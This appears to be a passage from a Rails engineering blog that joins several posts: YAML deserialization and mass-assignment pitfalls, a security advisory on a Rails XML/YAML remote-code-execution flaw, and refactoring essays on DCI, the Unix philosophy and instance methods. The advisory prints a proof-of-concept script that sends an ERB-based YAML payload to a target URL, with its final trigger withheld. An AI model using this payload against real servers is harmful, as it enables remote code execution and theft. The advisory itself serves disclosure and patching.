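To see concretely why this is dangerous: prior to Psych 4 (which made YAML.load safe by default), loading a YAML document could instantiate any class defined in the process and set its instance variables. Preference here is a stand-in class for illustration:

```ruby
require "yaml"

class Preference
  attr_reader :admin
end

# A YAML document tagged with an arbitrary Ruby class name
doc = "--- !ruby/object:Preference\nadmin: true\n"

# Psych 4 changed YAML.load to be safe; unsafe_load reproduces the
# old behavior this article describes.
load_method = YAML.respond_to?(:unsafe_load) ? :unsafe_load : :load
obj = YAML.public_send(load_method, doc)

obj.class  # => Preference
obj.admin  # => true
```

The deserializer never called Preference.new; it allocated the object and set @admin directly, entirely driven by the document's contents.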

Best Practice: Use the JSON serialization format instead of YAML for #serialize and #store:

class User < ActiveRecord::Base
  serialize :preferences, JSON
  store :theme, accessors: [ :color, :bgcolor ], coder: JSON
end

The Fix: Rails should switch its default serialization format for ActiveRecord from YAML to JSON. The YAML behavior should be either available by opt-in or extracted into an optional Gem.

9. Mass Assignment

Rails 4 switched from using attr_accessible to deal with mass assignment vulnerabilities to the strong_parameters approach. The params object is now an instance of ActionController::Parameters. strong_parameters works by checking that instances of Parameters used in mass assignment are “permitted” – that a developer has specifically indicated which keys (and value types) are expected.

In general, this is a positive change, but it does introduce a new attack vector that was not present in the attr_accessible world. Consider this example:

params = { user: { admin: true }.to_json }
# => {:user=>"{\"admin\":true}"}

@user = User.new(JSON.parse(params[:user]))

JSON.parse returns an ordinary Ruby Hash rather than an instance of ActionController::Parameters. With strong_parameters, the default behavior is to allow instances of Hash to set any model attribute via mass assignment. The same issue occurs if you use params from a Sinatra app when accessing an ActiveRecord model – Sinatra will not wrap the Hash in an instance of ActionController::Parameters.

Best Practice: Rely on Rails’ out-of-the-box parsing whenever possible. When combining ActiveRecord models with other web frameworks (or deserializing data from caches, queues, etc.), wrap input in ActionController::Parameters so that strong_parameters protections apply.
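To make the distinction concrete, here is a toy version of what permitting does. This is an illustration only, not the ActionController::Parameters API:

```ruby
require "json"

# Toy illustration of permitting: keep only whitelisted keys from
# untrusted input, dropping everything else (like "admin").
def permit(raw, *allowed)
  allowed_keys = allowed.map(&:to_s)
  raw.select { |key, _| allowed_keys.include?(key.to_s) }
end

raw = JSON.parse('{"name":"Eve","admin":true}')
permit(raw, :name)  # => {"name"=>"Eve"}
```

The point of the vulnerability above is that a raw Hash from JSON.parse skips this filtering step entirely, because Rails only enforces permitting on Parameters instances.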

The Fix: It’s unclear what the best way for Rails to deal with this is. Rails could override deserialization methods like JSON.parse to return instances of ActionController::Parameters but that is relatively invasive and could cause compatibility issues.

A concerned developer could combine strong_parameters with attr_accessible for highly sensitive fields (like User#admin) for extra protection, but that is likely overkill for most situations. In the end, this may just be a behavior we need to be aware of and look out for.

Hat tip to Brendon Murphy for making me aware of this issue.

Thanks to Adam Baldwin, Justin Collins, Neil Matatell, Noah Davis and Aaron Patterson for reviewing this article.

We interrupt our regularly scheduled code quality content to raise awareness about a recently-disclosed, critical security vulnerability in Rails.

On Tuesday, a vulnerability was patched in Rails’ Action Pack layer that allows for remote code execution. Since then, a number of proof of concepts have been publicly posted showing exactly how to exploit this issue to trick a remote server into running an attacker’s arbitrary Ruby code.

This post is an attempt to document the facts, raise awareness, and drive organizations to protect their applications and data immediately. Given the presence of automated attack tools, mass scanning for vulnerable applications is likely already in progress.

Vulnerability Summary

An attacker sends a specially crafted XML request to the application containing an embedded YAML-encoded object. Rails parses the XML and loads the objects from YAML. In the process, arbitrary Ruby code sent by the attacker may be executed (depending on the type and structure of the injected objects).

  • Threat Agents: Anyone who is able to make HTTP(S) requests to your Rails application.
  • Exploitability: Easy — Proof of concepts in the wild require only the URL of the application to attack and a Ruby code payload.
  • Prevalence: Widespread — All Rails versions prior to those released on Tuesday are vulnerable.
  • Detectability: Easy — No special knowledge of the application is required to test it for the vulnerability, making it simple to perform automated spray-and-pray scans.
  • Technical Impacts: Severe — Attackers can execute Ruby (and therefore shell) code at the privilege level of the application process, potentially leading to host takeover.
  • Business Impacts: Severe — All of your data could be stolen and your server resources could be used for malicious purposes. Consider the reputation damage from these impacts.

Step by step:

  1. Rails parses parameters based on the Content-Type of the request. You do not have to be generating XML based responses, calling respond_to or taking any specific action at all for the XML params parser to be used.
  2. The XML params parser (prior to the patched versions) activates the YAML parser for elements with type="yaml". Here’s a simple example of XML embedding YAML (the YAML goes inside the element):

     <foo type="yaml">
     foo:
     - 1
     - 2
     </foo>
  3. YAML allows the deserialization of arbitrary Ruby objects (provided the class is loaded in the Ruby process at the time of the deserialization), setting provided instance variables.
  4. Because of Ruby’s dynamic nature, the YAML deserialization process itself can trigger code execution, including invoking methods on the objects being deserialized.
  5. Some Ruby classes that are present in all Rails apps (e.g. an ERB template) evaluate arbitrary code that is stored in their instance variables (template source, in the case of ERB).
  6. Evaluating arbitrary Ruby code allows for the execution of shell commands, giving the attacker the full privileges of the user running the application server (e.g. Unicorn) process.

It’s worth noting that any Ruby code which takes untrusted input and processes it with YAML.load is subject to a similar vulnerability (known as “object injection”). This could include third-party RubyGems beyond Rails, or your own application source code. Now is a good time to check for those cases as well.

Proof of Concept

At the suggestion of a member of the Rails team who I respect, I’ve edited this post to withhold some details about how this vulnerability is being exploited. Please be aware however that full, automated exploits are already in the hands of the bad guys, so do not drag your feet on patching.

There are a number of proof of concepts floating around (see the External Links section), but the ones I saw all required special libraries. This is an example based on them with out-of-the-box Ruby (and Rack):

# Copyright (c) 2013 Bryan Helmkamp, Postmodern, GPLv3.0
require "net/https"
require "uri"
require "base64"
require "rack"

url   = ARGV[0]
code  = File.read(ARGV[1])

# Construct a YAML payload wrapped in XML
payload = <<-PAYLOAD.strip
<fail type="yaml">
--- !ruby/object:ERB
  template:
    src: !binary |-
      #{Base64.encode64(code)}
</fail>
PAYLOAD

# Build an HTTP request
uri = URI.parse(url)
http = Net::HTTP.new(uri.host, uri.port)
if uri.scheme == "https"
  http.use_ssl = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
request = Net::HTTP::Post.new(uri.request_uri)
request["Content-Type"] = "text/xml"
request["X-HTTP-Method-Override"] = "get"
request.body = payload

# Print the response
response = http.request(request)
puts "HTTP/1.1 #{response.code} #{Rack::Utils::HTTP_STATUS_CODES[response.code.to_i]}"
response.each { |header, value| puts "#{header}: #{value}" }
puts
puts response.body

There’s not much to it beyond the payload itself. The only interesting detail is the use of the X-Http-Method-Override header which instructs Rails to interpret the POST request as a GET.

Original reports indicated that the vulnerability could only be used against POST/PUT-accessible endpoints. With this trick, we can send a POST (with an XML body) that the Rails router resolves as a GET. This makes the issue even easier to exploit because you don’t have to identify a POST-accessible URL for each application.

How It Works

Knowing that Rails will YAML.load the payload, the only difficulty is building a tree of objects that, when deserialized, executes arbitrary Ruby code in the payload. The object graph must be constructed using only classes that are present in the process.

This proof of concept uses ERB, a Ruby object that conveniently is designed to hold Ruby code in its @src instance variable and execute it when #result is called. The only thing missing is triggering the #result call. Suffice it to say, a slightly more complex YAML payload can achieve this. I’ve decided to omit the exact specifics here, but I’m aware of two vectors:

  • Ruby’s YAML parser calls #init_with, a hook that objects can define to control YAML deserialization. So any class that defines #init_with and also calls methods on its own instance variables in it could be leveraged to trigger a call into the malicious code.
  • Ruby’s YAML parser can also trigger the invocation of the #[]= (hash setter) method on objects it is building, so objects that take dangerous action based on assigned hash values are also exploitable.
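The hook behind the first vector is easy to demonstrate in isolation, without weaponizing it. Any loaded class that defines #init_with has that method called during deserialization, driven entirely by attacker-controlled data. Widget here is a stand-in class, and YAML.unsafe_load is used because modern Psych makes YAML.load safe by default:

```ruby
require "yaml"

class Widget
  attr_reader :name, :hook_ran

  # Psych invokes this hook while building the object, before the
  # application ever sees it; the coder's contents come straight
  # from the (attacker-supplied) document.
  def init_with(coder)
    @name = coder["name"]
    @hook_ran = true
  end
end

load_method = YAML.respond_to?(:unsafe_load) ? :unsafe_load : :load
widget = YAML.public_send(load_method, "--- !ruby/object:Widget\nname: gadget\n")

widget.hook_ran  # => true
widget.name      # => "gadget"
```

A class whose #init_with (or #[]=) goes on to call methods on those injected values is the bridge from deserialization to code execution.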

Assessment

With the app source, check for the presence of an affected Rails version and the absence of a workaround. Assessing vulnerability without source code access is slightly more complex but still easy. By sending in payloads and checking the server’s response, you can detect if the application seems to be performing YAML deserialization of params.

For example, Metasploit now includes a scanner that sends two requests, one with a valid YAML object and one with invalid YAML. If the server responds differently (for example, if it returns a 500 for the invalid YAML only), it is likely deserializing the YAML and vulnerable.

Mitigation

The simplest fix is to upgrade to one of the patched Rails releases: 3.2.11, 3.1.10, 3.0.19 or 2.3.15. If you cannot upgrade immediately, consider applying one of the published patches.

Workarounds exist for Rails 2.3 and above to disable the dangerous functionality from an initializer without requiring a Rails upgrade.

Because of the severity of this issue, if you cannot upgrade or patch your Rails version immediately, consider urgently applying the workaround.

External Links

Thanks to Adam Baldwin of Lift Security for reviewing this post.

Our latest post comes from Giles Bowkett. Giles recently wrote a book, Rails As She Is Spoke, which explores Rails’ take on OOP and its implications. It’s an informative and entertaining read, and you should buy it.

A few days ago I wrote a blog post arguing that rails developers should take DCI seriously. Be careful what you wish for! A tumultuous brouhaha soon ensued on Twitter. I can’t necessarily take the credit for that, but I’m glad it happened, because one of the people at the center of the cyclone, Rails creator David Heinemeier Hansson, wrote a good blog post on ActiveSupport::Concern, which included a moment of taking DCI seriously.

[…] breaking up domain logic into concerns is similar in some ways to the DCI notion of Roles. It doesn’t have the run-time mixin acrobatics nor does it have the “thy models shall be completely devoid of logic themselves” prescription, but other than that, it’ll often result in similar logic extracted using similar names.

DCI (data, context, and interaction) is a paradigm for structuring object-oriented code. Its inventor, Trygve Reenskaug, also created MVC, an object-oriented paradigm every Rails developer should be familiar with. Most Ruby implementations of DCI use mixins quite a lot, and there is indeed some similarity there.

However, there’s a lot more to DCI than just mixins, and since I’ve already gone into detail about it elsewhere, as have many others, I won’t get into that here. I’m very much looking forward to case studies from people who’ve used it seriously. Likewise, there are a lot of good reasons to feel cautious about using mixins, either for Rails concerns or for DCI, but that discussion’s ongoing and deserves (and is receiving) several blog posts of its own.

What I want to talk about is this argument in Hansson’s blog post:

I find that concerns are often just the right amount of abstraction and that they often result in a friendlier API. I far prefer current_account.posts.visible_to(current_user) to involving a third query object. And of course things like Taggable that needs to add associations to the target object are hard to do in any other way. It’s true that this will lead to a proliferation of methods on some objects, but that has never bothered me. I care about how I interact with my code base through the source.

I added the emphasis to the final sentence because I think it’s far more important than most people realize.

To explain, I want to draw an example from my new book Rails As She Is Spoke, which has a silly title but a serious theme, namely the ways in which Rails departs from traditional OOP, and what we can learn from that. The example concerns the familiar method url_for. But I should say “methods,” because the Rails code base (as of version 3.2) contains five different methods named url_for.

The implementations for most of these methods are hideous, and they make it impossible not to notice the absence of a Url class anywhere in the Rails code base — a truly bizarre bit of domain logic for a Web framework not to model — yet these same, hideously constructed methods enable application developers to use a very elegant API:

url_for controller: foo, action: bar, additional: whatnot  

Consider again what Hansson said about readable code:

I care about how I interact with my code base through the source.

I may be reading too much into a single sentence here, but after years of Rails development, I strongly believe that Rails uses this statement about priorities as an overarching design principle. How else do you explain a Web framework that does not contain a Url class within its own internal domain logic, yet provides incredible conveniences like automated migrations and generators for nearly every type of file you might need to create?

The extraordinary internal implementation of ActiveRecord::Base, and its extremely numerous modules, bends over backwards to mask all the complexity inherent in instantiating database-mapping objects. It does much, much less work to make its own internal operations easy to understand, or easy to reason about, or easy to subclass, and if you want to cherry-pick functionality from ActiveRecord::Base, your options span a baffling range from effortless to impossible.

Consider a brief quote from this recent blog post on the params object in Rails controllers:

In Ruby, everything is an object and this unembarrassed object-orientation gives Ruby much of its power and expressiveness. […] In Rails, however, sadly, there are large swathes which are not object oriented, and in my opinion, these areas tend to be the most painful parts of Rails.

I agree with part of this statement. I think it’s fair to say that Ruby takes its object-oriented nature much more seriously than Rails does. I also agree that customizing Rails can be agonizingly painful, whenever you dip below the framework’s beautifully polished surface into the deeper realms of its code, which is sometimes object-oriented and sometimes not. But if you look at this API:

url_for controller: foo, action: bar, additional: whatnot  

It doesn’t look like object-oriented code at all. An object-oriented version would look more like this:

Url.new(:foo, :bar, additional: whatnot)  

The API Rails uses looks like Lisp, minus all the aggravating parentheses.

(url_for ((controller, 'foo),
          (action, 'bar),
          (additional, whatnot)))

That API is absolutely not, in my opinion, one of “the most painful parts of Rails.” It’s one of the least painful parts of Rails. I argue in my book that Rails owes a lot of its success to creating a wonderful user experience for developers — making it the open source equivalent of Apple — and I think this code is a good example.

Rails disregards object orientation whenever being object-oriented stands in the way of a clean API, and I actually think this is a very good design decision, with one enormous caveat: when Rails first debuted, Rails took a very firm position that it was an opinionated framework very highly optimized for one (and only one) particular class of Web application.

If (and only if) every Rails application hews to the same limited range of use cases, and never strays from the same narrow path of limited complexity, then (and only then) it makes perfect sense to prioritize the APIs which developers see over their ability to reason about the domain logic of their applications and of the framework itself.

Unfortunately, the conditions of my caveat do not pertain to the overwhelming majority of Rails apps. This is why Rails 3 abandoned the hard line on opinionated software for a more conciliatory approach, which is to say that Rails is very highly optimized for a particular class of Web application, but sufficiently modular to support other types of Web applications as well.

If you take this as a statement about the characteristics of Rails 3, it’s outrageously false, but if you take it as a design goal for Rails 3 and indeed (hopefully) Rails 4, it makes a lot of sense and is a damn good idea.

In this context, finding “just the right amount of abstraction” requires more than just defining the most readable possible API. It also requires balancing the most readable possible API with the most comprehensible possible domain model. There’s an analogy to human writing: you can’t just write beautiful sentences and call it a day. If you put beautiful sentences on pages at random, you might have poetry, if you get lucky, but you won’t have a story.

This is an area where DCI demolishes concerns, because DCI provides an entire vocabulary for systematic decomposition. If there’s any guiding principle for decomposing models with concerns, I certainly don’t recall seeing it, ever, even once, in my 7 years as a Rails developer. As far as I can tell the closest thing is: “Break the class into multiple files if…”

  • There are too many lines of code.
  • It’s Tuesday.
  • It’s not Tuesday.

DCI gives developers something more fine-grained.

I’m not actually a DCI zealot; I’m waiting until I’ve built an app with DCI and had it running for a while before I make any strident or definitive statements. The Code Climate blog itself featured some alternative solutions to the overburdened models problem, and these solutions emphasize classes over mixins. You could do worse than to follow them to the letter. Other worthwhile alternatives exist as well; there is no silver bullet.

However, Rails concerns are just one way to decompose overburdened models. Concerns are appropriate for some apps and inappropriate for others, and I suspect the same is true of DCI. Either way, if you want to support multiple types of applications, with multiple levels and types of complexity, then making a blanket decision about “just the right amount of abstraction” is pretty risky, because that decision may in fact function at the wrong level of abstraction itself.

It doesn’t take a great deal of imagination to understand that different apps feature different levels of complexity, and you should choose which technique you use for managing complexity based on how much complexity you’re going to be managing. As William Gibson said, “the street finds its own uses for things,” and I think most Rails developers use Rails to build apps that are more complex than the apps Rails is optimized for. I’ve certainly seen apps where that was true, and in those apps, concerns did not solve the problem.

It’s possible this means people should be using Merb instead of Rails, although that train appears to have left the station (and of course it left the station on Rails).

Applying the Unix Philosophy to Object-Oriented Design

Today I’m thrilled to present a guest post from my friend John Pignata. John is Director of Engineering Operations at GroupMe.

In 1964, Doug McIlroy, an engineer at Bell Labs, wrote an internal memo describing some of his ideas for the Multics operating system. The surviving tenth page summarizes the four items he felt were most important. The first item on the list reads:

“We should have some ways of coupling programs like [a] garden hose – screw in another segment when it becomes necessary to massage data in another way.”

This sentence describes what ultimately became the Unix pipeline: the chaining together of a set of programs such that the output of one is fed into the next as input. Every time we run a command like tail -5000 access.log | awk '{print $4}' | sort | uniq -c we’re benefiting from the legacy of McIlroy’s garden hose analogy. The pipeline enables each program to expose a small set of features and, through the interface of the standard streams, collaborate with other programs to deliver a larger unit of functionality.

It’s mind-expanding when a Unix user figures out how to snap together their system’s various small command-line programs to accomplish tasks. The pipeline renders each command-line tool more powerful as a stage in a larger operation than it could have been as a stand-alone utility. We can couple together any number of these small programs as necessary and build new tools which add specific features as we need them. We can now speak Unix in compound sentences.

Without the interface of the standard streams to allow programs to collaborate, Unix systems might have ended up with larger programs with duplicative feature sets. In Microsoft Windows, most programs tend to be their own closed universes of functionality. To get word count of a document you’re writing on a Unix system, you’d run wc -w document.md. On a system running Windows you’d likely have to boot the entire Microsoft Word application in order to get a word count of document.docx. The count functionality of Word is locked in the context of use of editing a Word document.

Just as Unix and Windows are composed of programs as units of functionality, our systems are composed of objects. When we build chunky, monolithic objects that wrap huge swaths of procedural code, we’re building our own closed universes of functionality. We’re trapping the features we’ve built within a given context of use. Our objects are obfuscating important domain concepts by hiding them as implementation details.

In coarse-grained systems, each single object fills multiple roles increasing their complexity and resistance to change. Extending an object’s functionality or swapping out an implementation for another sometimes involves major shotgun surgery. The battle against complexity is fought within the definition of every object in your system. Fine-grained systems are composed of objects that are easier to understand, to modify, and to use.

Some years after that memo, McIlroy summarized the Unix philosophy as: “write programs that do one thing and do it well. Write programs to work together.” Eric Raymond rephrased this in The Art of Unix Programming as the Rule of Modularity: “write simple parts connected by clean interfaces.” This philosophy is a powerful strategy to help us manage complexity within our systems. Like Unix, our systems should consist of many small components each of which are focused on a specific task and work with each other via their interfaces to accomplish a larger task.

Everything But the Kitchen Sink

Let’s look at an example of an object that contains several different features. The requirement represented in this code is to create an old-school web guestbook for our home page. For anyone who missed the late nineties, like its physical analog a web guestbook was a place for visitors to acknowledge a visit to a web page and to leave public comments for the maintainer.

When we start the project the requirements are straightforward: save a name, an IP address, and a comment from any visitor that fills out the form and display those contents in an index view. We scaffold up a controller, generate a migration, a new model, sprinkle web design in some ERB templates, high five, and call it a day. This is a Rails system, I know this.

Over time our requirements begin growing and we slowly start adding new features. First, in real-life operations we realize that spammers are posting to the form so we want to build a simple spam filter to reject posts containing certain words. We also realize we want some kind of rate-limiting to prevent visitors from posting more than one message per day. Finally, we want to post to Twitter when a visitor signs our guestbook because if we’re going to be anachronistic with our code example, let’s get really weird with it.

require "set"

class GuestbookEntry < ActiveRecord::Base
  SPAM_TRIGGER_KEYWORDS = %w(viagra acne adult loans xxx mortgage).to_set
  RATE_LIMIT_KEY = "guestbook"
  RATE_LIMIT_TTL = 1.day

  validate :ensure_content_not_spam, on: :create
  validate :ensure_ip_address_not_rate_limited, on: :create

  after_create :post_to_twitter
  after_create :record_ip_address

  private

  def ensure_content_not_spam
    flagged_words = SPAM_TRIGGER_KEYWORDS & Set.new(content.split)

    unless flagged_words.empty?
      errors[:content] << "Your post has been rejected."
    end
  end

  def ensure_ip_address_not_rate_limited
    if $redis.exists("#{RATE_LIMIT_KEY}:#{ip_address}")
      errors[:base] << "Sorry, please try again later."
    end
  end

  def post_to_twitter
    client = Twitter::Client.new(Configuration.twitter_options)
    client.update("We had a visitor! #{name} said #{content.first(50)}")
  end

  def record_ip_address
    $redis.setex("#{RATE_LIMIT_KEY}:#{ip_address}", RATE_LIMIT_TTL, "1")
  end
end

These features are oversimplified but set that aside for the purposes of this example. The above code shows us a hodgepodge of entwined features. Like the Microsoft Word example of the word count feature, the features we’ve built are locked within the context of creating a GuestbookEntry.

This kind of approach has several real-world implications. For one, the tests for this object likely exercise some of these features in the context of saving a database object. We don’t need to round-trip to our database in order to validate that our rate limiting code is working, but since we’ve hung it off an after_create callback, that’s likely what we’ll do because that’s the interface our application uses. These tests are also likely littered with unrelated details and setup due to the coupling to unrelated but neighboring behavior and data.

At a glance it’s difficult to untangle which code relates to which feature. When looking at the code, we have to think about each line to discern which of the object’s behaviors that line is principally concerned with. Clear naming helps us in this example, but in a system where each behavior was represented by a domain object, we’d be able to assume that a line of code related to the object’s assigned responsibility.

Lastly, it’s easy for us to glance over the fact that we have, for example, the acorn of a user content spam filter in our system because it’s a minor detail of another object. If this were its own domain concept it would be much clearer that it was a first-class role within the system.

Applying the Unix Philosophy

Let’s look at this implementation through the lens of the Rule of Modularity. The above code fails the “simple parts, clean interfaces” sniff test. In our current factoring, we can’t extend or change these features without diffusing more details about them into the GuestbookEntry object. The only interface by which our model uses this behavior is internal callbacks triggered through the object’s lifecycle. There are no external interfaces to these features despite the fact that each has its own behavior and data. This object now has several reasons to change.

Let’s refactor these features by extracting this behavior to independent objects to see how these shake out as stand-alone domain concepts. First we’ll extract the code in our spam check implementation into its own object.

require "set"

class UserContentSpamChecker
  TRIGGER_KEYWORDS = %w(viagra acne adult loans xrated).to_set

  def initialize(content)
    @content = content
  end

  def spam?
    flagged_words.present?
  end

  private

  def flagged_words
    TRIGGER_KEYWORDS & @content.split
  end
end

Features like this have serious sprawl potential. When we first see the problem of abuse, we’re likely to respond with the simplest thing that could work. There’s usually quite a bit of churn in this code as our combatants expose new weaknesses in our implementation. The rate of change of our spam protection strategy is inherently different from that of our GuestbookEntry persistence object. Identifying our UserContentSpamChecker as its own dedicated domain concept and establishing it as such will allow us to more easily maintain and extend this functionality independently of where it’s being used.

Next we’ll extract our rate limiting code. Some small changes are required to decouple it fully from the guestbook such as the addition of a namespace.

class UserContentRateLimiter
  DEFAULT_TTL = 1.day

  def initialize(ip_address, namespace, options = {})
    @ip_address = ip_address
    @namespace  = namespace
    @ttl        = options.fetch(:ttl, DEFAULT_TTL)
    @redis      = options.fetch(:redis, $redis)
  end

  def exceeded?
    @redis.exists?(key)
  end

  def record
    @redis.setex(key, @ttl, "1")
  end

  private

  def key
    "rate_limiter:#{@namespace}:#{@ip_address}"
  end
end

Now that we have a stand-alone domain object, more advanced requirements for this rate limiting logic will only change this one object. Our tests can exercise this feature in isolation apart from any potential consumer of its functionality. This will not only speed up tests, but help future readers of the code in reading the tests to understand the feature more quickly.

Finally we’ll extract our call to the Twitter gem. It’s tiny, but there’s good reason to keep it separate from our GuestbookEntry. Since Twitter and the gem are third-party APIs, we’d like to isolate the coupling to an adapter object that we use to hide the nitty-gritty details of sending a tweet.

class Tweeter
  def post(content)
    client.update(content)
  end

  private

  def client
    @client ||= Twitter::Client.new(Configuration.twitter_options)
  end
end

Now that we have these smaller components, we can change our GuestbookEntry object to make use of them. We’ll replace the extracted logic with calls to the objects we’ve just created.

class GuestbookEntry < ActiveRecord::Base
  validate :ensure_content_not_spam, on: :create
  validate :ensure_ip_address_not_rate_limited, on: :create

  after_create :post_to_twitter
  after_create :record_ip_address

  private

  def ensure_content_not_spam
    if UserContentSpamChecker.new(content).spam?
      errors[:content] << "Post rejected."
    end
  end

  def ensure_ip_address_not_rate_limited
    if rate_limiter.exceeded?
      errors[:base] << "Please try again later."
    end
  end

  def post_to_twitter
    Tweeter.new.post("New visitor! #{name} said #{content.first(50)}")
  end

  def record_ip_address
    rate_limiter.record
  end

  def rate_limiter
    @rate_limiter ||= UserContentRateLimiter.new(ip_address, :guestbook)
  end
end

This new version is only a couple of lines shorter than our original implementation, but it knows much less about its constituent parts. Many of the details of how these features are implemented have found a dedicated home in our domain, with our model calling those collaborators to accomplish the larger task of creating a GuestbookEntry. These features are now independently testable and individually addressable. They are no longer locked in the context of creating a GuestbookEntry. At the meager cost of a few more files and some more code, we now have simpler objects and a better set of interfaces. These objects can be changed with less risk of ripple effects, and their interfaces can be called by other objects in the system.

Wrapping Up

“Good code invariably has small methods and small objects. I get lots of resistance to this idea, especially from experienced developers, but no one thing I do to systems provides as much help as breaking it into more pieces.” – Kent Beck, Smalltalk Best Practice Patterns

The Unix philosophy illustrates that small components that work together through an interface can be extraordinarily powerful. Nesting an aspect of your domain as an implementation detail of a specific model conflates responsibilities, bloats code, makes tests less isolated and slower, and hides concepts that should be first-class in your system.

Don’t let your domain concepts be shy. Promote them to full-fledged objects to make them more understandable, isolate and speed up their tests, reduce the likelihood that changes in neighboring features will have ripple effects, and provide the concepts a place to evolve apart from the rest of the system. The only thing we know with certainty about the futures of our systems is that they will change. We can design our systems to be more amenable to inevitable change by following the Unix philosophy and building clean interfaces between small objects that have one single responsibility.

One of the most common questions I received following my 7 Patterns to Refactor Fat ActiveRecord Models post was “Why are you using instances where class methods will do?”. I’d like to address that. Simply put:

I prefer object instances to class methods because class methods resist refactoring.

To illustrate, let’s look at an example background job for syncing data to a third-party analytics service:
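A sketch of the shape of such a job in its class-method form (the Analytics::Client and the model stand-ins here are illustrative, stubbed so the example runs on its own):

```ruby
require "socket"

# Illustrative stand-ins for the real analytics client and models:
module Analytics
  class Client
    def initialize(api_key)
      @api_key = api_key
    end

    def create_or_update_user(attributes)
      attributes # the real client would POST to the analytics API
    end
  end
end

Account = Struct.new(:id, :name, :users)
User    = Struct.new(:name, :email)

class SyncToAnalyticsService
  ConnectionFailure = Class.new(StandardError)

  def self.perform(account)
    client = Analytics::Client.new("api-key")
    account.users.each do |user|
      attributes = {
        account_id:   account.id,
        account_name: account.name,
        name:         user.name,
        email:        user.email
      }
      client.create_or_update_user(attributes)
    end
  rescue SocketError => error
    # Wrapping categorizes the failure under this service in error tracking
    raise ConnectionFailure, error.message
  end
end
```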

The job iterates over each user sending a hash of attributes as an HTTP POST. If a SocketError is raised, it gets wrapped as a SyncToAnalyticsService::ConnectionFailure, which ensures it gets categorized properly in our error tracking system.

The SyncToAnalyticsService.perform method is pretty complex. It certainly has multiple responsibilities. The Single Responsibility Principle (SRP) can be thought of as fractal, applying at finer and finer levels of detail: to applications, modules, classes and methods. SyncToAnalyticsService.perform is not a Composed Method because not all of the operations of the method are at the same level of abstraction.

One solution would be to apply Extract Method a few times. You’d end up with something like this:
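A sketch of that result, with illustrative stand-ins for the client and models so it runs on its own:

```ruby
require "socket"

# Illustrative stand-ins:
module Analytics
  class Client
    def initialize(api_key)
      @api_key = api_key
    end

    def create_or_update_user(attributes)
      attributes
    end
  end
end

Account = Struct.new(:id, :name, :users)
User    = Struct.new(:name, :email)

class SyncToAnalyticsService
  ConnectionFailure = Class.new(StandardError)

  def self.perform(account)
    client = build_client
    account.users.each { |user| sync_user(client, account, user) }
  rescue SocketError => error
    raise ConnectionFailure, error.message
  end

  # The extracted helpers must pass intermediate values around explicitly,
  # and can't easily be made private at the class level.
  def self.build_client
    Analytics::Client.new("api-key")
  end

  def self.sync_user(client, account, user)
    client.create_or_update_user(user_attributes(account, user))
  end

  def self.user_attributes(account, user)
    { account_id: account.id, account_name: account.name,
      name: user.name, email: user.email }
  end
end
```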

This is a little better than the original, but it doesn’t feel right. It’s certainly not object oriented. It feels like a weird hybrid of procedural and functional programming, stuck in an object-based world. Additionally, you can’t easily declare the extracted methods private because they are at the class level. (You’d have to switch to an ugly class << self form.)

If I came across the original SyncToAnalyticsService implementation, I wouldn’t be eager to refactor only to end up with the above result. Instead, suppose we started with this:
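A sketch of that starting point (again with illustrative, self-contained stand-ins):

```ruby
require "socket"

# Illustrative stand-ins:
module Analytics
  class Client
    def initialize(api_key)
      @api_key = api_key
    end

    def create_or_update_user(attributes)
      attributes
    end
  end
end

Account = Struct.new(:id, :name, :users)
User    = Struct.new(:name, :email)

class SyncToAnalyticsService
  ConnectionFailure = Class.new(StandardError)

  def initialize(account)
    @account = account
  end

  def perform
    client = Analytics::Client.new("api-key")
    @account.users.each do |user|
      client.create_or_update_user(
        account_id:   @account.id,
        account_name: @account.name,
        name:         user.name,
        email:        user.email
      )
    end
  rescue SocketError => error
    raise ConnectionFailure, error.message
  end
end
```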

Almost identical, but this time the functionality is in an instance method rather than a class method. Again, applying Extract Method we might end up with something like this:
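A sketch of where that lands (stand-ins illustrative, as before the class definition is what matters):

```ruby
require "socket"

# Illustrative stand-ins:
module Analytics
  class Client
    def initialize(api_key)
      @api_key = api_key
    end

    def create_or_update_user(attributes)
      attributes
    end
  end
end

Account = Struct.new(:id, :name, :users)
User    = Struct.new(:name, :email)

class SyncToAnalyticsService
  ConnectionFailure = Class.new(StandardError)

  def initialize(account)
    @account = account
  end

  def perform
    @account.users.each { |user| sync_user(user) }
  rescue SocketError => error
    raise ConnectionFailure, error.message
  end

  private

  # Intermediate variables become memoized accessors instead of parameters
  def client
    @client ||= Analytics::Client.new("api-key")
  end

  def account_attributes
    @account_attributes ||= { account_id: @account.id, account_name: @account.name }
  end

  def sync_user(user)
    client.create_or_update_user(
      account_attributes.merge(name: user.name, email: user.email)
    )
  end
end
```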

Instead of adding class methods that have to pass around intermediate variables to get work done, we have methods like #account_attributes which memoize their results. I love this technique. When breaking down a method, extracting intermediate variables as memoized accessors is one of my favorite refactorings. The class didn’t start with any state, but as it was decomposed it was helpful to add some.

The result feels much cleaner to me. Refactoring to this feels like a clear win. There is now state and logic encapsulated together in an object. It’s easier to test because you can separate the creation of the object (Given) from the invocation of the action (When). And we’re not passing variables like the Account and Analytics::Client around everywhere.

Also, every piece of code that uses this logic won’t be coupled to the (global) class name. You can’t easily swap in a new class, but you can easily swap in a new instance. This encourages building up additional behavior with composition, rather than needing to re-open and expand classes for every change.

Refactoring note: I’d probably leave this class implemented as the last source listing shows. However, if the logic becomes more complex, this job is begging for a class to sync a single user to be split out.

So how does this relate to the premise of this article? I’m unlikely to see the opportunities for refactoring class methods because decomposing them produces ugly code. Starting with the instance form makes your refactoring options clear, and reduces friction to taking action on them. I’ve observed this effect many times in my own coding, and also anecdotally across many Ruby teams over the years.

Objections

YAGNI (You Aren’t Going To Need It)

YAGNI is an important principle, but misapplied in this case. If you open these classes in your editor, neither form is more or less complicated than the other. Saying “YAGNI an object here” is sort of like saying “YAGNI to indent with two spaces instead of a single tab.” The variants are only different stylistically. Applying YAGNI to object oriented design only makes sense if there’s a difference in understandability (e.g. using one class versus two).

It Uses an Extra Object

Some people object on the basis that the instance form creates an additional object. That’s true, but in practice it doesn’t matter. Rails requests and background jobs create thousands upon thousands of Ruby objects. Optimizing object creation to lessen the stress on the Ruby garbage collector is a legitimate technique, but do it where it counts. You can only find out where it counts by measuring. It’s inconceivable that the single additional object that the instance variant creates will have a measurable impact on the performance of your system. (If you have a counter example with data, I’d love to hear about it.)

It’s Cumbersome to Call

Finally, some people object that SyncToAnalyticsService.perform(account) is simply easier to type than SyncToAnalyticsService.new(account).perform.

